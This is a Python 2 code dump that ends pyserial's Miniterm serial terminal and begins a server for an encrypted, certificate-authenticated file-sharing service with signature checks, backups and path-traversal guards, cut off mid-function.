sys.stderr.write('--- %-20s %s\n' % (port, desc))
CONVERT_CRLF = 2
CONVERT_CR = 1
CONVERT_LF = 0
NEWLINE_CONVERISON_MAP = (LF, CR, CRLF)
LF_MODES = ('LF', 'CR', 'CR/LF')
REPR_MODES = ('raw', 'some control', 'all control', 'hex')
class Miniterm(object):
def __init__(self, port, baudrate, parity, rtscts, xonxoff, echo=False, convert_outgoing=CONVERT_CRLF, repr_mode=0):
try:
self.serial = serial.serial_for_url(port, baudrate, parity=parity, rtscts=rtscts, xonxoff=xonxoff, timeout=1)
except AttributeError:
# happens when the installed pyserial is older than 2.5. use the
# Serial class directly then.
self.serial = serial.Serial(port, baudrate, parity=parity, rtscts=rtscts, xonxoff=xonxoff, timeout=1)
self.echo = echo
self.repr_mode = repr_mode
self.convert_outgoing = convert_outgoing
self.newline = NEWLINE_CONVERISON_MAP[self.convert_outgoing]
self.dtr_state = True
self.rts_state = True
self.break_state = False
def _start_reader(self):
"""Start reader thread"""
self._reader_alive = True
# start serial->console thread
self.receiver_thread = threading.Thread(target=self.reader)
self.receiver_thread.setDaemon(True)
self.receiver_thread.start()
def _stop_reader(self):
"""Stop reader thread only, wait for clean exit of thread"""
self._reader_alive = False
self.receiver_thread.join()
def start(self):
self.alive = True
self._start_reader()
# enter console->serial loop
self.transmitter_thread = threading.Thread(target=self.writer)
self.transmitter_thread.setDaemon(True)
self.transmitter_thread.start()
def stop(self):
self.alive = False
def join(self, transmit_only=False):
self.transmitter_thread.join()
if not transmit_only:
self.receiver_thread.join()
def dump_port_settings(self):
sys.stderr.write("\n--- Settings: %s %s,%s,%s,%s\n" % (
self.serial.portstr,
self.serial.baudrate,
self.serial.bytesize,
self.serial.parity,
self.serial.stopbits))
sys.stderr.write('--- RTS: %-8s DTR: %-8s BREAK: %-8s\n' % (
(self.rts_state and 'active' or 'inactive'),
(self.dtr_state and 'active' or 'inactive'),
(self.break_state and 'active' or 'inactive')))
try:
sys.stderr.write('--- CTS: %-8s DSR: %-8s RI: %-8s CD: %-8s\n' % (
(self.serial.getCTS() and 'active' or 'inactive'),
(self.serial.getDSR() and 'active' or 'inactive'),
(self.serial.getRI() and 'active' or 'inactive'),
(self.serial.getCD() and 'active' or 'inactive')))
except serial.SerialException:
# on RFC 2217 ports it can happen to no modem state notification was
# yet received. ignore this error.
pass
sys.stderr.write('--- software flow control: %s\n' % (self.serial.xonxoff and 'active' or 'inactive'))
sys.stderr.write('--- hardware flow control: %s\n' % (self.serial.rtscts and 'active' or 'inactive'))
sys.stderr.write('--- data escaping: %s linefeed: %s\n' % (
REPR_MODES[self.repr_mode],
LF_MODES[self.convert_outgoing]))
def reader(self):
"""loop and copy serial->console"""
try:
while self.alive and self._reader_alive:
data = character(self.serial.read(1))
if self.repr_mode == 0:
# direct output, just have to care about newline setting
if data == '\r' and self.convert_outgoing == CONVERT_CR:
sys.stdout.write('\n')
else:
sys.stdout.write(data)
elif self.repr_mode == 1:
# escape non-printable, let pass newlines
if self.convert_outgoing == CONVERT_CRLF and data in '\r\n':
if data == '\n':
sys.stdout.write('\n')
elif data == '\r':
pass
elif data == '\n' and self.convert_outgoing == CONVERT_LF:
sys.stdout.write('\n')
elif data == '\r' and self.convert_outgoing == CONVERT_CR:
sys.stdout.write('\n')
else:
sys.stdout.write(repr(data)[1:-1])
elif self.repr_mode == 2:
# escape all non-printable, including newline
sys.stdout.write(repr(data)[1:-1])
elif self.repr_mode == 3:
# escape everything (hexdump)
for c in data:
sys.stdout.write("%s " % c.encode('hex'))
sys.stdout.flush()
except serial.SerialException, e:
self.alive = False
# would be nice if the console reader could be interruptted at this
# point...
raise
def writer(self):
"""\
Loop and copy console->serial until EXITCHARCTER character is
found. When MENUCHARACTER is found, interpret the next key
locally.
"""
menu_active = False
try:
while self.alive:
try:
b = console.getkey()
except KeyboardInterrupt:
b = serial.to_bytes([3])
c = character(b)
if menu_active:
if c == MENUCHARACTER or c == EXITCHARCTER: # Menu character again/exit char -> send itself
self.serial.write(b) # send character
if self.echo:
sys.stdout.write(c)
elif c == '\x15': # CTRL+U -> upload file
sys.stderr.write('\n--- File to upload: ')
sys.stderr.flush()
console.cleanup()
filename = sys.stdin.readline().rstrip('\r\n')
if filename:
try:
file = open(filename, 'r')
sys.stderr.write('--- Sending file %s ---\n' % filename)
while True:
line = file.readline().rstrip('\r\n')
if not line:
break
self.serial.write(line)
self.serial.write('\r\n')
# Wait for output buffer to drain.
self.serial.flush()
sys.stderr.write('.') # Progress indicator.
sys.stderr.write('\n--- File %s sent ---\n' % filename)
except IOError, e:
sys.stderr.write('--- ERROR opening file %s: %s ---\n' % (filename, e))
console.setup()
elif c in '\x08hH?': # CTRL+H, h, H, ? -> Show help
sys.stderr.write(get_help_text())
elif c == '\x12': # CTRL+R -> Toggle RTS
self.rts_state = not self.rts_state
self.serial.setRTS(self.rts_state)
sys.stderr.write('--- RTS %s ---\n' % (self.rts_state and 'active' or 'inactive'))
elif c == '\x04': # CTRL+D -> Toggle DTR
self.dtr_state = not self.dtr_state
self.serial.setDTR(self.dtr_state)
sys.stderr.write('--- DTR %s ---\n' % (self.dtr_state and 'active' or 'inactive'))
elif c == '\x02': # CTRL+B -> toggle BREAK condition
self.break_state = not self.break_state
self.serial.setBreak(self.break_state)
sys.stderr.write('--- BREAK %s ---\n' % (self.break_state and 'active' or 'inactive'))
elif c == '\x05': # CTRL+E -> toggle local echo
self.echo = not self.echo
sys.stderr.write('--- local echo %s ---\n' % (self.echo and 'active' or 'inactive'))
elif c == '\x09': # CTRL+I -> info
self.dump_port_settings()
elif c == '\x01': # CTRL+A -> cycle escape mode
self.repr_mode += 1
if self.repr_mode > 3:
self.repr_mode = 0
sys.stderr.write('--- escape data: %s ---\n' % (
REPR_MODES[self.repr_mode],
))
elif c == '\x0c': # CTRL+L -> cycle linefeed mode
self.convert_outgoing += 1
if self.convert_outgoing > 2:
self.convert_outgoing = 0
self.newline = NEWLINE_CONVERISON_MAP[self.convert_outgoing]
sys.stderr.write('--- line feed %s ---\n' % (
LF_MODES[self.convert_outgoing],
))
elif c in 'pP': # P -> change port
dump_port_list()
sys.stderr.write('--- Enter port name: ')
sys.stderr.flush()
console.cleanup()
try:
port = sys.stdin.readline().strip()
except KeyboardInterrupt:
port = None
console.setup()
if port and port != self.serial.port:
# reader thread needs to be shut down
self._stop_reader()
# save settings
settings = self.serial.getSettingsDict()
try:
try:
new_serial = serial.serial_for_url(port, do_not_open=True)
except AttributeError:
# happens when the installed pyserial is older than 2.5. use the
# Serial class directly then.
new_serial = serial.Serial()
new_serial.port = port
# restore settings and open
new_serial.applySettingsDict(settings)
new_serial.open()
new_serial.setRTS(self.rts_state)
new_serial.setDTR(self.dtr_state)
new_serial.setBreak(self.break_state)
except Exception, e:
sys.stderr.write('--- ERROR opening new port: %s ---\n' % (e,))
new_serial.close()
else:
self.serial.close()
self.serial = new_serial
sys.stderr.write('--- Port changed to: %s ---\n' % (self.serial.port,))
# and restart the reader thread
self._start_reader()
elif c in 'bB': # B -> change baudrate
sys.stderr.write('\n--- Baudrate: ')
sys.stderr.flush()
console.cleanup()
backup = self.serial.baudrate
try:
self.serial.baudrate = int(sys.stdin.readline().strip())
except ValueError, e:
sys.stderr.write('--- ERROR setting baudrate: %s ---\n' % (e,))
self.serial.baudrate = backup
else:
self.dump_port_settings()
console.setup()
elif c == '8': # 8 -> change to 8 bits
self.serial.bytesize = serial.EIGHTBITS
self.dump_port_settings()
elif c == '7': # 7 -> change to 8 bits
self.serial.bytesize = serial.SEVENBITS
self.dump_port_settings()
elif c in 'eE': # E -> change to even parity
self.serial.parity = serial.PARITY_EVEN
self.dump_port_settings()
elif c in 'oO': # O -> change to odd parity
self.serial.parity = serial.PARITY_ODD
self.dump_port_settings()
elif c in 'mM': # M -> change to mark parity
self.serial.parity = serial.PARITY_MARK
self.dump_port_settings()
elif c in 'sS': # S -> change to space parity
self.serial.parity = serial.PARITY_SPACE
self.dump_port_settings()
elif c in 'nN': # N -> change to no parity
self.serial.parity = serial.PARITY_NONE
self.dump_port_settings()
elif c == '1': # 1 -> change to 1 stop bits
self.serial.stopbits = serial.STOPBITS_ONE
self.dump_port_settings()
elif c == '2': # 2 -> change to 2 stop bits
self.serial.stopbits = serial.STOPBITS_TWO
self.dump_port_settings()
elif c == '3': # 3 -> change to 1.5 stop bits
self.serial.stopbits = serial.STOPBITS_ONE_POINT_FIVE
self.dump_port_settings()
elif c in 'xX': # X -> change software flow control
self.serial.xonxoff = (c == 'X')
self.dump_port_settings()
elif c in 'rR': # R -> change hardware flow control
self.serial.rtscts = (c == 'R')
self.dump_port_settings()
else:
sys.stderr.write('--- unknown menu character %s --\n' % key_description(c))
menu_active = False
elif c == MENUCHARACTER: # next char will be for menu
menu_active = True
elif c == EXITCHARCTER:
self.stop()
break # exit app
elif c == '\n':
self.serial.write(self.newline) # send newline character(s)
if self.echo:
sys.stdout.write(c) # local echo is a real newline in any case
sys.stdout.flush()
else:
self.serial.write(b) # send byte
if self.echo:
sys.stdout.write(c)
sys.stdout.flush()
except:
self.alive = False
raise
def main():
import optparse
parser = optparse.OptionParser(
usage = "%prog [options] [port [baudrate]]",
description = "Miniterm - A simple terminal program for the serial port."
)
group = optparse.OptionGroup(parser, "Port settings")
group.add_option("-p", "--port",
dest = "port",
help = "port, a number or a device name. (deprecated option, use parameter instead)",
default = DEFAULT_PORT
)
group.add_option("-b", "--baud",
dest = "baudrate",
action = "store",
type = 'int',
help = "set baud rate, default %default",
default = DEFAULT_BAUDRATE
)
group.add_option("--parity",
dest = "parity",
action = "store",
help = "set parity, one of [N, E, O, S, M], default=N",
default = 'N'
)
group.add_option("--rtscts",
dest = "rtscts",
action = "store_true",
help = "enable RTS/CTS flow control (default off)",
default = False
)
group.add_option("--xonxoff",
dest = "xonxoff",
action = "store_true",
help = "enable software flow control (default off)",
default = False
)
group.add_option("--rts",
dest = "rts_state",
action = "store",
type = 'int',
help = "set initial RTS line state (possible values: 0, 1)",
default = DEFAULT_RTS
)
group.add_option("--dtr",
dest = "dtr_state",
action = "store",
type = 'int',
help = "set initial DTR line state (possible values: 0, 1)",
default = DEFAULT_DTR
)
parser.add_option_group(group)
group = optparse.OptionGroup(parser, "Data handling")
group.add_option("-e", "--echo",
dest = "echo",
action = "store_true",
help = "enable local echo (default off)",
default = False
)
group.add_option("--cr",
dest = "cr",
action = "store_true",
help = "do not send CR+LF, send CR only",
default = False
)
group.add_option("--lf",
dest = "lf",
action = "store_true",
help = "do not send CR+LF, send LF only",
default = False
)
group.add_option("-D", "--debug",
dest = "repr_mode",
action = "count",
help = """debug received data (escape non-printable chars)
--debug can be given multiple times:
0: just print what is received
1: escape non-printable characters, do newlines as unusual
2: escape non-printable characters, newlines too
3: hex dump everything""",
default = 0
)
parser.add_option_group(group)
group = optparse.OptionGroup(parser, "Hotkeys")
group.add_option("--exit-char",
dest = "exit_char",
action = "store",
type = 'int',
help = "ASCII code of special character that is used to exit the application",
default = 0x1d
)
group.add_option("--menu-char",
dest = "menu_char",
action = "store",
type = 'int',
help = "ASCII code of special character that is used to control miniterm (menu)",
default = 0x14
)
parser.add_option_group(group)
group = optparse.OptionGroup(parser, "Diagnostics")
group.add_option("-q", "--quiet",
dest = "quiet",
action = "store_true",
help = "suppress non-error messages",
default = False
)
parser.add_option_group(group)
(options, args) = parser.parse_args()
options.parity = options.parity.upper()
if options.parity not in 'NEOSM':
parser.error("invalid parity")
if options.cr and options.lf:
parser.error("only one of --cr or --lf can be specified")
if options.menu_char == options.exit_char:
parser.error('--exit-char can not be the same as --menu-char')
global EXITCHARCTER, MENUCHARACTER
EXITCHARCTER = chr(options.exit_char)
MENUCHARACTER = chr(options.menu_char)
port = options.port
baudrate = options.baudrate
if args:
if options.port is not None:
parser.error("no arguments are allowed, options only when --port is given")
port = args.pop(0)
if args:
try:
baudrate = int(args[0])
except ValueError:
parser.error("baud rate must be a number, not %r" % args[0])
args.pop(0)
if args:
parser.error("too many arguments")
else:
# noport given on command line -> ask user now
if port is None:
dump_port_list()
port = raw_input('Enter port name:')
convert_outgoing = CONVERT_CRLF
if options.cr:
convert_outgoing = CONVERT_CR
elif options.lf:
convert_outgoing = CONVERT_LF
try:
miniterm = Miniterm(
port,
baudrate,
options.parity,
rtscts=options.rtscts,
xonxoff=options.xonxoff,
echo=options.echo,
convert_outgoing=convert_outgoing,
repr_mode=options.repr_mode,
)
except serial.SerialException, e:
sys.stderr.write("could not open port %r: %s\n" % (port, e))
sys.exit(1)
if not options.quiet:
sys.stderr.write('--- Miniterm on %s: %d,%s,%s,%s ---\n' % (
miniterm.serial.portstr,
miniterm.serial.baudrate,
miniterm.serial.bytesize,
miniterm.serial.parity,
miniterm.serial.stopbits,
))
sys.stderr.write('--- Quit: %s | Menu: %s | Help: %s followed by %s ---\n' % (
key_description(EXITCHARCTER),
key_description(MENUCHARACTER),
key_description(MENUCHARACTER),
key_description('\x08'),
))
if options.dtr_state is not None:
if not options.quiet:
sys.stderr.write('--- forcing DTR %s\n' % (options.dtr_state and 'active' or 'inactive'))
miniterm.serial.setDTR(options.dtr_state)
miniterm.dtr_state = options.dtr_state
if options.rts_state is not None:
if not options.quiet:
sys.stderr.write('--- forcing RTS %s\n' % (options.rts_state and 'active' or 'inactive'))
miniterm.serial.setRTS(options.rts_state)
miniterm.rts_state = options.rts_state
console.setup()
miniterm.start()
try:
miniterm.join(True)
except KeyboardInterrupt:
pass
if not options.quiet:
sys.stderr.write("\n--- exit ---\n")
miniterm.join()
#~ console.cleanup()
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
if __name__ == '__main__':
main()
|
server.py | # SERVER
try:
import socket
import ssl
import os
import errno
import time
import datetime
import json
import subprocess
import threading
import glob
import shutil
except ImportError:
raise ImportError("You need to do 'pip install -r requirements.txt' to be able to use this program.")
# PRELIMINARY NOTE: read the README.txt for informations about how to run this file
# READING:
# [!]: error information
# [+]: normal information
def mkdir_p(path):
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def get_client_loggedin_status(client_ip, serving_port, client_name, conn_tracker):
try:
loggedin_status = conn_tracker[(client_ip, serving_port)][2]
loggedin_status = (loggedin_status=="AUTHENTICATE")
if not loggedin_status:
print "[!][" + now() + "] Cutting off connection with ip %s in port %s. Action requires client authentication..." %(client_ip, serving_port)
return False
print "[+][" + now() + "] Client %s is authenticated." %(client_name)
return True
except IndexError:
print "[!][" + now() + "] Cutting off connection with ip %s in port %s. Action requires client authentication..." %(client_ip, serving_port)
return False # bye client
# (returns False if conn_tracker isn't correctly populated, returns the client_name otherwise)
def get_clientname(client_ip, serving_port, conn_tracker):
try:
client_name = conn_tracker[(client_ip, serving_port)][1]
return client_name
except KeyError:
print "[!][" + now() + "] Cutting off connection with ip %s in port %s. No hello message..." %(client_ip, serving_port)
return False # bye client
except IndexError:
print "[!][" + now() + "] Cutting off connection with ip %s in port %s. No name message..." %(client_ip, serving_port)
return False # bye client
def fs_getalldirs(currentside_dirname, remoteside_dirname, file_structure):
for local_filepath in os.listdir(currentside_dirname):
currentside_filepath = currentside_dirname + os.sep + local_filepath
if os.path.isdir(currentside_filepath):
remoteside_filepath = remoteside_dirname + os.sep + local_filepath
file_structure[remoteside_filepath] = os.listdir(currentside_filepath)
file_structure = fs_getalldirs(currentside_filepath, remoteside_filepath, file_structure)
return file_structure
def file_server2client(serverside_filepath, clientside_directory, filename, file_structure, file_content_flag=True, sharedfile_username=""):
if os.path.isdir(serverside_filepath):
pass # no need to do anything if it's a directory
else:
if filename.endswith(".key.encrypted") or filename.endswith(".key.encrypted." + sharedfile_username):
f = open(serverside_filepath)
filecontent = f.read()
filecontent = filecontent.encode("hex")
f.close()
elif filename.endswith(".sig"):
f = open(serverside_filepath)
filecontent = f.read()
filecontent = filecontent.encode("hex")
f.close()
elif filename.endswith(".encrypted"):
f = open(serverside_filepath)
filecontent = f.read()
filecontent = filecontent.encode("hex")
f.close()
else:
# return untouched file_structure if the key is from another user whom we shared a file with
return file_structure
mtime = os.path.getmtime(serverside_filepath)
mtime = get_time_repr(mtime)
if file_content_flag:
file_structure[clientside_directory][filename] = [filecontent, mtime]
else:
file_structure[clientside_directory][filename] = mtime
return file_structure
def fs_server2client(serverside_dirpath, clientside_dirpath, file_content_flag=True, sharedfile_username=""):
file_structure = dict()
file_structure[clientside_dirpath] = dict()
file_structure = fs_getalldirs(serverside_dirpath, clientside_dirpath, file_structure)
# clean all dictionary values before we populate them
for directory in file_structure:
file_structure[directory] = dict()
serverside_dirlist = [directory.replace(clientside_dirpath, serverside_dirpath, 1) for directory in file_structure]
for serverside_directory in serverside_dirlist:
clientside_directory = serverside_directory.replace(serverside_dirpath, clientside_dirpath, 1)
for filename in os.listdir(serverside_directory):
# append the file-names only to the respective directory
serverside_filepath = serverside_directory + os.sep + filename
file_structure = file_server2client(serverside_filepath, clientside_directory, filename, file_structure, file_content_flag, sharedfile_username)
return file_structure
# update json file with clients information
def update_json_file(client_name, registered_status):
server_global.clients_info[client_name] = [registered_status]
f = open(server_global.client_json_filename, 'w')
json.dump(server_global.clients_info, f)
f.close()
def get_subject(client_cert):
subject_str = "Subject: "
for elem in client_cert['subject']:
if len(elem)!=1:
return False
crt_param = elem[0]
if len(crt_param)!=2:
return False
if crt_param[0]=="countryName":
subject_str += "C = %s, " %(crt_param[1])
elif crt_param[0]=="stateOrProvinceName":
subject_str += "ST = %s, " %(crt_param[1])
elif crt_param[0]=="localityName":
subject_str += "L = %s, " %(crt_param[1])
elif crt_param[0]=="organizationName":
subject_str += "O = %s, " %(crt_param[1])
elif crt_param[0]=="commonName":
subject_str += "CN = %s" %(crt_param[1])
return subject_str
# have in mind this alone cannot make up for verifying a client's identity,
# we also need to make sure client's certificate is signed by our trusted issuer,
# i.e., by our client certificate signing CA
def verify_cert_subject(client_cert, correct_subject_info, client_name):
print "[+][" + now() + "] Verifying if m-TLS peer's certificate subject matches with client %s's specification." %(client_name)
# construct subject string from received client certificate
return get_subject(client_cert)==correct_subject_info
# in case client-side protection has been lift-off, this will sanitize the client name again for us
# it will also notify that something's wrong
def verify_clientname(client_name):
removed_str_list = [" ", "\"", "'", "\\", "/", ".", "-", ";", "\n", "=", ",", "*", "@", "%", "$", "!"]
for character in removed_str_list:
if character in client_name:
return False
return True
def now():
return datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S')
def get_time_repr(timestamp):
return datetime.datetime.fromtimestamp(timestamp).strftime('%Y-%m-%d %H:%M:%S')
# close CONNECTION socket
def server_close_connection_socket(conn, serving_port):
# NOTE: have in mind the difference between a 'listening socket' and a 'connection socket'.
# Closing a listening socket doesn't require to warn the client like when closing a connection socket
conn.close()
server_global.open_sockets.remove(conn)
print "[+][" + now() + "] I'm releasing a socket on port %s. It is now available for use." %(serving_port)
def server_send_nok(conn, client_name):
print "[+][" + now() + "] Server-Client(%s): 'NOK'" %(client_name)
conn.send("NOK")
return conn
def server_send_ok(conn, client_name):
print "[+][" + now() + "] Server-Client(%s): 'OK'" %(client_name)
conn.send("OK")
return conn
def server_get_send_regstatus(conn, client_name, send):
if client_name in server_global.clients_info and server_global.clients_info[client_name][0]:
if send:
print "[+][" + now() + "] Server-Client(%s): 'REGISTERED'" %(client_name)
conn.send("REGISTERED")
return conn, True
else:
if send:
print "[+][" + now() + "] Server-Client(%s): 'NOT-REGISTERED'" %(client_name)
conn.send("NOT-REGISTERED")
return conn, False
def server_send_clientcert(conn, client_certificate_path, client_name):
# send client his certificate signed by us, the server
f = open(client_certificate_path)
client_cert = f.read()
f.close()
print "[+][" + now() + "] Sending client %s his signed certificate.'" %(client_name)
conn.send(str(len(client_cert)))
conn.send(client_cert)
def server_sign_clientcert(client_csr_path, client_csr, client_name):
f = open(client_csr_path,"w")
f.write(client_csr)
f.close()
# verify client certificate matches username
print "[+][" + now() + "] Verifying %s's certificate signing request..." %(client_name)
cmd = "openssl req -text -noout -verify -in " + client_csr_path
proc = subprocess.Popen(cmd.split(), stdout=subprocess.PIPE, stderr=open(os.devnull))
csr_info = proc.stdout.read()
correct_subject_info = "Subject: C = PT, ST = Lisboa, L = Lisboa, O = " + client_name + ", CN = *." + client_name + ".org"
correct_subject_info_deprecated_openssl = "Subject: C=PT, ST=Lisboa, L=Lisboa, O=" + client_name + ", CN=*." + client_name + ".org"
csr_info = csr_info.split("\n")
csr_info = [elem.strip() for elem in csr_info]
# 4th element corresponds to client's subject information
if csr_info[3] in(correct_subject_info, correct_subject_info_deprecated_openssl):
print "[+][" + now() + "] %s's certificate signing request subject verified." %(client_name)
else:
# the CSR was modified in a way that it doesn't identify the current client
# BUG-NOTE: if this happens, the client would be hanging waiting for the signed certificate, but that's not expected behavior :)
print "[!][" + now() + "] Cutting off connection... someone modified the certificate signing request in a way that it doesn't have the correct information about client %s" %(client_name)
os.remove(client_csr_path)
return False
# signing client certificate
print "[+][" + now() + "] Signing %s's certificate and storing it in the default certificates directory..." %(client_name)
cmd = "." + os.sep + "SIGN_CLIENT_CERT.sh " + client_csr_path
subprocess.check_call(cmd.split(), stdout=open(os.devnull), stderr=subprocess.STDOUT)
os.remove(client_csr_path)
return True
def say_bye(client_ip, serving_port, conn_tracker):
try:
client_name = conn_tracker[(client_ip, serving_port)][1]
# CONN-TRACK
conn_tracker.pop((client_ip, serving_port))
except KeyError:
client_name = str((client_ip, serving_port))
except IndexError:
client_name = str((client_ip, serving_port))
conn_tracker.pop((client_ip, serving_port))
print "[+][" + now() + "] Client %s disconnected." %(client_name)
return conn_tracker
def deal_with_client(conn, client_ip, serving_port):
conn_tracker = dict()
new_conn = conn
data = new_conn.read()
# null data means the client is finished with us
while data:
new_conn, conn_continue, conn_tracker = interact_with_client(new_conn, data, client_ip, serving_port, conn_tracker)
if not conn_continue:
break
data = new_conn.read()
# finished with client
conn_tracker = say_bye(client_ip, serving_port, conn_tracker)
# detect and prevent path-traversal attacks in this file structure by denying access to upper directories
def path_traversal_verified(suspect_filepath, highestlevel_dirname):
if os.path.commonprefix((os.path.realpath(suspect_filepath),os.path.abspath(highestlevel_dirname))) != os.path.abspath(highestlevel_dirname):
return False
return True
def sandbox_escaped(currentside_filepath, currentside_dirname, conn, client_name):
if not path_traversal_verified(currentside_filepath, currentside_dirname):
#print currentside_filepath
#print currentside_dirname
print "[!][" + now() + "] Client %s just tried to escape his directory." %(client_name)
conn = server_send_nok(conn, client_name)
return True
return False
def fetch_files_dirs(serverside_path, clientside_path, client_name, sharedfile_username=""):
serverside_directory = os.path.dirname(serverside_path)
clientside_directory = os.path.dirname(clientside_path)
file_structure = dict()
if os.path.isdir(serverside_path):
file_structure = fs_server2client(serverside_path, clientside_path, True, sharedfile_username)
else:
file_structure[clientside_directory] = dict()
file_filename = os.path.basename(clientside_path) + ".encrypted"
key_filename = os.path.basename(clientside_path) + ".key.encrypted" if not sharedfile_username else os.path.basename(clientside_path) + ".key.encrypted." + sharedfile_username
sig_filename = os.path.basename(clientside_path) + ".sig"
serverside_filepath = serverside_directory + os.sep + file_filename
serverside_keypath = serverside_directory + os.sep + key_filename
serverside_sigpath = serverside_directory + os.sep + sig_filename
if os.path.isfile(serverside_filepath) and os.path.isfile(serverside_keypath) and os.path.isfile(serverside_sigpath):
file_structure = file_server2client(serverside_filepath, clientside_directory, file_filename, file_structure, True, sharedfile_username)
file_structure = file_server2client(serverside_keypath, clientside_directory, key_filename, file_structure, True, sharedfile_username)
file_structure = file_server2client(serverside_sigpath, clientside_directory, sig_filename, file_structure, True, sharedfile_username)
else:
print "[!][" + now() + "] Client %s is trying to fetch a non-existent file. Cutting connection off..." %(client_name)
return file_structure, False # bye client
return file_structure, True
def read_in_chunks(conn, client_name):
# handle unexpected data
try:
data_len = int(conn.read())
except ValueError:
print "[!][" + now() + "] Client %s tried to send me a string that does not correspond to an integer. Cutting off connection..." %(client_name)
return conn, False # bye client
chunk_len = min(data_len, 16384) # limit size before waiting
data_repr = ""
i=chunk_len
while i<=data_len:
data_repr += conn.recv(chunk_len)
i += chunk_len
if data_len%chunk_len!=0:
data_repr += conn.recv(data_len%16384)
data = json.loads(data_repr)
return conn, data
def send_in_chunks(conn, data):
data_repr = json.dumps(data)
data_repr_len = len(data_repr)
conn.send(str(data_repr_len))
conn.send(data_repr)
return conn
def get_user_cert_content(username):
client_cert_path = server_global.client_certificates_dir + os.sep + username + ".crt"
f = open(client_cert_path)
client_cert_content = f.read()
f.close()
return client_cert_content
def verify_digital_signature(pubkey_path,sig_filepath,cryptogram_filepath):
cmd = "openssl dgst -sha256 -verify " + pubkey_path + " -signature " + sig_filepath + " " + cryptogram_filepath
proc = subprocess.Popen(cmd.split(), stdout=subprocess.PIPE)
sig_verification = proc.stdout.read()
return sig_verification=="Verified OK\n"
def write_and_verify_signature(signature_bytecode, serverside_filepath, backup_filepath, cryptogram_filepath, pubkey_path):
signature = signature_bytecode.decode("hex")
sig_filepath = serverside_filepath + ".sig"
sig_backup_filepath = backup_filepath + ".sig"
f = open(sig_filepath, "w")
f.write(signature)
f.close()
f = open(sig_backup_filepath, "w")
f.write(signature)
f.close()
sig_verified = verify_digital_signature(pubkey_path, sig_filepath, cryptogram_filepath)
return sig_verified
def construct_client_files(conn, client_name, serverside_dirname, backup_dirname, clientside_dirname, sharedfiles_tag, file_structure):
pubkey_path = "clients" + os.sep + "client_certs" + os.sep + client_name + ".pubkey"
for clientside_directory in file_structure:
serverside_directory = clientside_directory.replace(clientside_dirname,serverside_dirname, 1) # replace only first occurence
backup_directory = clientside_directory.replace(clientside_dirname,backup_dirname, 1) # replace only first occurence
if sandbox_escaped(serverside_directory, serverside_dirname, conn, client_name):
return conn, False # bye client
mkdir_p(serverside_directory)
for filename in file_structure[clientside_directory]:
serverside_filepath = serverside_directory + os.sep + filename
backup_filepath = backup_directory + os.sep + filename
if sandbox_escaped(serverside_filepath, serverside_dirname, conn, client_name):
return conn, False # bye client
encrypted_filecontent_bytecode = file_structure[clientside_directory][filename][0]
encrypted_filecontent = encrypted_filecontent_bytecode.decode("hex")
cryptogram_filepath = serverside_filepath + ".encrypted"
cryptogram_backup_filepath = backup_filepath + ".encrypted"
file_exists = os.path.exists(cryptogram_filepath)
if sharedfiles_tag:
clientside_writetime = file_structure[clientside_directory][filename][2]
serverside_writetime = os.path.getmtime(cryptogram_filepath) if file_exists else 0
if clientside_writetime >= serverside_writetime:
mkdir_p(backup_directory) # only creates backup directory if a file in it has been altered
f = open(cryptogram_filepath, "w")
f.write(encrypted_filecontent)
f.close()
f = open(cryptogram_backup_filepath, "w")
f.write(encrypted_filecontent)
f.close()
signature_bytecode = file_structure[clientside_directory][filename][1]
sig_verified = write_and_verify_signature(signature_bytecode, serverside_filepath, backup_filepath, cryptogram_filepath, pubkey_path)
if not sig_verified:
print "[!][" + now() + "] Ciphered-file signature not verified: file \"%s\" wasn't signed by %s" %(cryptogram_filepath, client_name)
return conn, False # bye client
encrypted_aeskeys = file_structure[clientside_directory][filename][3:]
for aeskey_info in encrypted_aeskeys:
username = aeskey_info[0]
encrypted_aeskey_bytecode = aeskey_info[1]
encrypted_aeskey = encrypted_aeskey_bytecode.decode("hex")
f = open(serverside_filepath + ".key.encrypted." + username, "w")
f.write(encrypted_aeskey)
f.close()
f = open(backup_filepath + ".key.encrypted." + username, "w")
f.write(encrypted_aeskey)
f.close()
else:
clientside_writetime = file_structure[clientside_directory][filename][3]
serverside_writetime = os.path.getmtime(cryptogram_filepath) if file_exists else 0
if clientside_writetime >= serverside_writetime:
mkdir_p(backup_directory) # only creates backup directory if a file in it has been altered
f = open(cryptogram_filepath, "w")
f.write(encrypted_filecontent)
f.close()
f = open(cryptogram_backup_filepath, "w")
f.write(encrypted_filecontent)
f.close()
signature_bytecode = file_structure[clientside_directory][filename][2]
sig_verified = write_and_verify_signature(signature_bytecode, serverside_filepath, backup_filepath, cryptogram_filepath, pubkey_path)
if not sig_verified:
print "[!][" + now() + "] Ciphered-file signature not verified: file \"%s\" wasn't signed by %s" %(cryptogram_filepath, client_name)
return conn, False # bye client
encrypted_aeskey_bytecode = file_structure[clientside_directory][filename][1]
encrypted_aeskey = encrypted_aeskey_bytecode.decode("hex")
f = open(serverside_filepath + ".key.encrypted", "w")
f.write(encrypted_aeskey)
f.close()
f = open(backup_filepath + ".key.encrypted", "w")
f.write(encrypted_aeskey)
f.close()
return conn, True
def get_individual_backup_dirs(client_name):
serverside_individual_dirname = server_global.individual_backup_files_dir + os.sep + client_name + "@"
all_backup_dirs = sorted(os.listdir(server_global.individual_backup_files_dir))
client_backup_dirs = []
for client_backup_directory in all_backup_dirs:
server_backup_file = server_global.individual_backup_files_dir + os.sep + client_backup_directory
if serverside_individual_dirname in server_backup_file:
client_backup_dirs.append(client_backup_directory.split(client_name + "@", 1)[-1])
return client_backup_dirs
def get_shared_backup_dirs(client_name):
all_backup_dirs = sorted(os.listdir(server_global.shared_backup_files_dir))
client_backup_dirs = []
for client_backup_directory in all_backup_dirs:
client_names_list = client_backup_directory.split("@",1)[0].split("-")
if client_name in client_names_list:
client_backup_dirs.append(client_backup_directory)
return client_backup_dirs
def delete_file_or_dir(path):
if os.path.isdir(path):
shutil.rmtree(path)
else:
os.remove(path)
def empty_directory(path):
for i in glob.glob(os.path.join(path, '*')):
delete_file_or_dir(i)
# note we assume register steps aren't compromised for real clients in the report,
# although we already provision for such events
# return values: (connection_socket, end_with_client)
def interact_with_client(conn, data, client_ip, serving_port, conn_tracker):
print "CONNECTION TRACKER: %s" %(conn_tracker)
# ----------------------
# CLIENT HELLO MESSAGE |
# ----------------------
if data=="HELLO":
